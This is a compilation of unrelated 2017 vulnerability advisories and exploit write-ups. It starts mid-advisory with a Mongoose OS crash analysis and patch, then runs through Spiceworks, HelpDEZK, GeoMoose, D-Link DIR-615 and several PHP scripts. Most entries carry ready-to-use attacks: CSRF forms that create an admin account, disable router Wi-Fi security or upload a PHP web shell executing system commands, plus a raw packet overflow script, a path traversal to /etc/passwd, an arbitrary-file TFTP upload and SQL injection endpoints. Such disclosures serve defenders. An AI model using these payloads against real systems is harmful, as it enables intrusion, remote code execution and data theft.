Further debugging shows that an uninitialized string has indeed been passed to c_strnstr:
---------------8<---------------
(gdb) info symbol 0x401114b4
c_strnstr + 12 in section .flash.text
(gdb) list *0x401114b4
0x401114b4 is in c_strnstr (/mongoose-os/mongoose/mongoose.c:1720).
warning: Source file is more recent than executable.
1715 }
1716 #endif /* _WIN32 */
1717
1718 /* The simplest O(mn) algorithm. Better implementation are GPLed */
1719 const char *c_strnstr(const char *s, const char *find, size_t slen) WEAK;
1720 const char *c_strnstr(const char *s, const char *find, size_t slen) {
1721 size_t find_length = strlen(find);
1722 size_t i;
1723
1724 for (i = 0; i < slen; i++) {
(gdb) list *0x401136cc
0x401136cc is in mg_http_multipart_continue (/mongoose-os/mongoose/mongoose.c:5893).
5888 mg_http_free_proto_data_mp_stream(&pd->mp_stream);
5889 pd->mp_stream.state = MPS_FINISHED;
5890
5891 return 1;
5892 }
5893
5894 static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
5895 const char *boundary;
5896 struct mbuf *io = &c->recv_mbuf;
5897 struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
(gdb)
--------------->8---------------
Workaround / Fix:
-----------------
Apply the following (tested and confirmed) patch:
---------------8<---------------
$ diff --git a/mongoose/mongoose.c b/mongoose/mongoose.c
index 91dc8b9..063f8c6 100644
--- a/mongoose/mongoose.c
+++ b/mongoose/mongoose.c
@@ -5889,6 +5889,12 @@ static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
return 0;
}
+ if(pd->mp_stream.boundary == NULL){
+ pd->mp_stream.state = MPS_FINALIZE;
+ LOG(LL_INFO, ("invalid request: boundary not initialized"));
+ return 0;
+ }
+
boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len);
if (boundary != NULL) {
const char *boundary_end = (boundary + pd->mp_stream.boundary_len);
--------------->8---------------
The patch has been merged into Mongoose OS on github.com on 2017-04-03 [4]
Timeline:
---------
2017-04-03: Coordinated public disclosure date
2017-04-03: Release of patch
2017-03-20: Initial vendor response, code usage sign-off
2017-03-19: Initial vendor notification
2017-03-19: Assigned CVE-2017-7185
2017-03-11: Confirmation and patching Philipp Promeuschel, Carel van Rooyen
2017-03-08: Initial inspection Philipp Promeuschel, Carel van Rooyen
2017-03-08: Discovery by Philipp Promeuschel
References:
-----------
[1] https://www.cesanta.com/
[2] https://github.com/cesanta/mongoose/blob/66a96410d4336c312de32b1cf5db954aab9ee2ec/mongoose.c#L7760
[3] http://www.ietf.org/rfc/rfc2046.txt
[4] https://github.com/cesanta/mongoose-os/commit/042eb437973a202d00589b13d628181c6de5cf5b
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt
[+] ISR: APPARITIONSEC
Vendor:
==================
www.spiceworks.com
Product:
=================
Spiceworks - 7.5
Provides network inventory and monitoring of all the devices on the network by discovering IP-addressable devices.
It can be configured to provide custom alerts and notifications based on various criteria. it also provides a ticketing system,
a user portal, an integrated knowledge base, and mobile ticket management.
Vulnerability Type:
==============================================
Improper Access Control File Overwrite / Upload
CVE Reference:
==============
CVE-2017-7237
Security Issue:
================
The Spiceworks TFTP Server, as distributed with Spiceworks Inventory 7.5, allows remote attackers to access the Spiceworks "data\configurations"
directory by leveraging the unauthenticated nature of the TFTP service for all clients who can reach UDP port 69. This allows remote attackers to
overwrite files within the Spiceworks configurations directory, if the targeted file name is known or guessed.
Remote attackers who can reach UDP port 69 can also write/upload arbitrary files to the "data\configurations", this can potentially become a
Remote Code Execution vulnerability if for example an executable file e.g. EXE, BAT is dropped, then later accessed and run by an unknowing
Spiceworks user.
References - released April 3, 2017:
====================================
https://community.spiceworks.com/support/inventory/docs/network-config#security
Proof:
=======
1) Install Spiceworks
2) c:\>tftp -i VICTIM-IP PUT someconfig someconfig
3) Original someconfig gets overwritten
OR
Arbitrary file upload
c:\>tftp -i VICTIM-IP PUT Evil.exe Evil.exe
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
======================================================================
Vendor Notification: March 13, 2017
Sent vendor e.g. POC : March 23, 2017
Request status : March 30, 2017
Vendor reply: "We are still working on this" March 30, 2017
Vendor reply :"Thanks for bringing this to our attention"
and releases basic security note of issue on website : April 3, 2017
April 5, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
# Exploit Title: Multiple CSRF Remote Code Execution Vulnerability on HelpDEZK 1.1.1
# Date: 05-April-2017
# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
# Vendor Homepage: http://www.helpdezk.org/
# Software Link: https://codeload.github.com/albandes/helpdezk/zip/v1.1.1
# Version: 1.1.1
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 - CRITICAL)# CVE: CVE-2017-7446 and CVE-2017-7447
I. Background:
HelpDEZk is a powerfull software that manages requests/incidents. It has all the needed requirements to an efficient workflow management of all processes involved in service execution. This control is done for internal demands and also for outsourced services. HelpDEZk can be used at any company's area, serving as an support to the shared service center concept, beyond the ability to log all the processes and maintain the request's history, it can pass it through many approval levels. HelpDEZk can put together advanced managing resources with an extremely easy use. Simple and intuitive screens make the day-by-day easier for your team, speeding up the procedures and saving up a lot of time. It is developped in objects oriented PHP language, with the MVC architecture and uses the templates system SMARTY. For the javascripts, JQUERY is used.
II. Description:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
HelpDEZK have role for type person:
admin = 1
user = 2
operator = 3
costumer = 4
partner = 5
group = 6
III. Exploit:
—> The first CSRF Target is: “/admin/home#/person/”
(Admin - Records - People & Companies)
The guest (no have account) can make admin privilege with CSRF Remote Code Execution. This is script for make account admin:
<html>
<!-- CSRF PoC on insert menu people -->
<body>
<form action="http://192.168.228.186/helpdezk-1.1.1/admin/person/insertNatural" method="POST">
<input type="hidden" name="login" value="testing" />
<input type="hidden" name="logintype" value=“3” /> <!-- Type Login = 3 (HD) -->
<input type="hidden" name="password" value="testing" />
<input type="hidden" name="name" value="testing" />
<input type="hidden" name="email" value="testing@local.com" /> <!-- e.g: testing@local.com -->
<input type="hidden" name="company" value="60" />
<input type="hidden" name="department" value="1" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="branch" value="" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="country" value="1" />
<input type="hidden" name="state" value="1" />
<input type="hidden" name="cpf" value="" />
<input type="hidden" name="city" value="1" />
<input type="hidden" name="neighborhood" value="Choose" />
<input type="hidden" name="zipcode" value="" />
<input type="hidden" name="typestreet" value="1" />
<input type="hidden" name="address" value="Choose" />
<input type="hidden" name="number" value="" />
<input type="hidden" name="complement" value="" />
<input type="hidden" name="typeuser" value="1" /> <!-- admin privilege -->
<input type="hidden" name="location" value="" />
<input type="hidden" name="vip" value="N" />
<input type="hidden" name="filladdress" value="N" />
<input type="hidden" name="dtbirth" value="" />
<input type="hidden" name="gender" value="M" />
<input type="hidden" name="time_value" value="" />
<input type="hidden" name="overtime" value="" />
<input type="hidden" name="changePassInsert" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
—> The second CSRF target is: /admin/home#/logos/
(Admin - Config - Logos)
If we have minimum low privilege, we can remote code execute to make shell on module logos (Position of Page Header, Login Page and Reports Logo). The HelpDEZK unrestricted file extension but normally access only for admin.
If you have low privilege, please choose which one to execute this code (before execute, you shall login into application):
<!-- CSRF PoC - Login Page Logo -->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");
xhr.withCredentials = true;
var body = "-----------------------------1883328331133778598415248998\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"if(isset($_REQUEST[\'cmd\'])){\n" +
" echo \"\x3cpre\x3e\";\n" +
" $cmd = ($_REQUEST[\'cmd\']);\n" +
" system($cmd);\n" +
" echo \"\x3c/pre\x3e\";\n" +
" die;\n" +
"}\n" +
"\n" +
"?\x3e\r\n" +
"-----------------------------1883328331133778598415248998--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
————
<!-- CSRF PoC Page Header Logo -->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------11525671838941487412014811928");
xhr.withCredentials = true;
var body = "-----------------------------11525671838941487412014811928\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"if(isset($_REQUEST[\'cmd\'])){\n" +
" echo \"\x3cpre\x3e\";\n" +
" $cmd = ($_REQUEST[\'cmd\']);\n" +
" system($cmd);\n" +
" echo \"\x3c/pre\x3e\";\n" +
" die;\n" +
"}\n" +
"\n" +
"?\x3e\r\n" +
"-----------------------------11525671838941487412014811928--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
———————
<!-- CSRF PoC - Reports Logo -->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload3", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1789373681642463979344317937");
xhr.withCredentials = true;
var body = "-----------------------------1789373681642463979344317937\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"if(isset($_REQUEST[\'cmd\'])){\n" +
" echo \"\x3cpre\x3e\";\n" +
" $cmd = ($_REQUEST[\'cmd\']);\n" +
" system($cmd);\n" +
" echo \"\x3c/pre\x3e\";\n" +
" die;\n" +
"}\n" +
"\n" +
"?\x3e\r\n" +
"-----------------------------1789373681642463979344317937--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
————
If you have executed and success, check your file on:
http://example.com/helpdezk-1.1.1/app/uploads/logos/
and PWN ^_^
http://example.com/helpdezk-1.1.1/app/uploads/logos/login_index.php?cmd=ipconfig
IV. Thanks to:
- Alloh SWT
- MyBoboboy
- Komunitas IT Auditor & IT Security
Refer:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)http://rungga.blogspot.co.id/2017/04/multiple-csrf-remote-code-execution.html
https://github.com/albandes/helpdezk/issues/2
import socket
import binascii
import time
import struct
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect(("10.101.0.85", 8400))
def sr(p=None, r=None):
if p:
print "sending %d bytes: %s " % (len(p)/2,p)
payl = binascii.a2b_hex(p)
s.send(payl)
if r:
data = s.recv(1024*2)
print "received %d bytes: %s " % (len(data),binascii.b2a_hex(data))
pkt1 = "0000003800000010000000100000000f00000000000000000000000000000000000000000000000000000000000000010000000000000000"
pkt1 += "0000100309000101090000000000ffe80000000800010000"
pkt1 += "0000000400000004"
pkt2 = "0000100309000509000000090000ffe800000036"+"00018016"
pkt2 += "02000000"+"09050009"+"c14d4d0"+"000000000000000003a793102076376642e6578656a231a0200429d750500989796059c16e042"+"fd00b417"
pkt3 = "53534c634c6e54"+"01"+"000b"+"77696e323031322d303200"+"03"+"0000000300000001"
p = "41"*0xd0
pkt3 += p
sr(pkt1,1)
sr(pkt2,1)
sr(pkt3,1)
exit()
s.close()
# Exploit Title: GeoMoose <= 2.9.2 Local File Disclosure
# Exploit Author: Sander 'dsc' Ferdinand
# Date: 2017-03-4
# Version: <= 2.9.2
# Blog: https://ced.pwned.systems/advisories-geomoose-local-file-disclosure-2-9-2.html
# Vendor Homepage: geomoose.org
# Reported: 4-3-2017
# Vendor response: http://osgeo-org.1560.x6.nabble.com/Geomoose-users-GeoMoose-Security-Issue-td5315873.html
# Software Link: https://github.com/geomoose/geomoose
# Tested on: Windows/Linux
# CVE : none
/php/download.php?id=foo/.&ext=/../../../../../../../etc/passwd
/php/download.php?id=foo/.&ext=/../../../../../../../WINDOWS/system32/drivers/etc/hosts
Title:
====
D-Link DIR 615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability
Credit:
======
Name: Pratik S. Shah
Reference:
=========
CVE Details: CVE-2017-7398.
Date:
====
1-04-2017
Vendor:
======
D-Link wireless router
Product:
=======
DIR-615
http://www.dlink.co.in/products/?pid=678
Affected Version:
=============
Hardware: T1 , Firmware: 20.09
Abstract:
=======
This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
Attack Type:
===================
Remote
Details:
=========
CSRF vulnerability in D-link DIR 615 wireless router enables an attacker to perform unwanted actions on router, which may lead to gaining full control of the device.
Proof Of Concept:
================
1) User login to D-link DIR 615 wireless router
2) User visits the attacker's malicious web page (DlinkCSRF.html)
3) DlinkCSRF.html exploits CSRF vulnerability and changes the Security Options to None
This is the CSRF POC for changing the Security option from WPA2 to None( Parameter: Method)
Attacker can also tamper following parameters
hiddenSSID
SSID
Passwords for all the applicable security options
<html>
<!-- CSRF PoC - D-link DIR 615 HW:T1 FW:20.09 -->
<body>
<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value=“Hacked” />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="0" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method_cur" value="6" />
<input type="hidden" name="method" value="0" />
<input type="hidden" name="authType" value="1" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value=“CSRF@test” />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Disclosure Timeline:
======================================
Vendor Notification: 6th March 2017
# # # # #
# Exploit Title: Doctors Appointment Script - SQL Injection
# Google Dork: N/A
# Date: 05.04.2017
# Vendor Homepage: http://appointment-script.com/
# Software: http://appointment-script.com/demo
# Demo: http://appointment-script.com/demo
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?lat=[SQL]&lon=[SQL]&category=[SQL]&insurance=[SQL]
# user
# id
# first_name
# last_name
# username
# email
# password
# user_level_id
# Doctor profile images file upload vulnerability available.
# http://localhost/[PATH]/images/doctor_image/...
# # # # #
# # # # #
# Exploit Title: Sweepstakes Pro Software - SQL Injection
# Google Dork: N/A
# Date: 05.04.2017
# Vendor Homepage: http://bimedia.info/
# Software: http://bimedia.info/sweepstakes-pro-software/
# Demo: http://mysweepstakespro.com/demo/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/win.php?s=[SQL]
# http://localhost/[PATH]/widget_lb.php?s=[SQL]
# ss_members :id
# ss_members :name
# ss_members :email
# ss_members :country
# ss_members :their_username
# ss_members :their_password
# # # # #
# # # # #
# Exploit Title: Premium Penny Auction Script - SQL Injection
# Google Dork: N/A
# Date: 05.04.2017
# Vendor Homepage: http://bimedia.info/
# Software: http://bimedia.info/premium-penny-auction-script/
# Demo: http://pennyauction.clonedemo.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/allauctions.php?aid=[SQL]
# http://localhost/[PATH]/news.php?nid=[SQL]
# http://localhost/[PATH]/productdetails.php?aid=[SQL]&pid=[SQL]
# admin :id
# admin :username
# admin :pass
# affiliate_transaction :aff_id
# affiliate_transaction :user_id
# affiliate_transaction :referer_id
# affiliate_transaction :amount
# affiliate_transaction :commission
# affiliate_transaction :bid_pack_title
# # # # #
# # # # #
# Exploit Title: Airbnb Crashpadder Clone Script - SQL Injection
# Google Dork: N/A
# Date: 05.04.2017
# Vendor Homepage: http://bimedia.info/
# Software: http://bimedia.info/airbnb-premium-clone-script/
# Demo: http://airbnb.clonedemo.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/page/1[SQL]
# http://localhost/[PATH]/view-rental/1/1[SQL]
# # # # #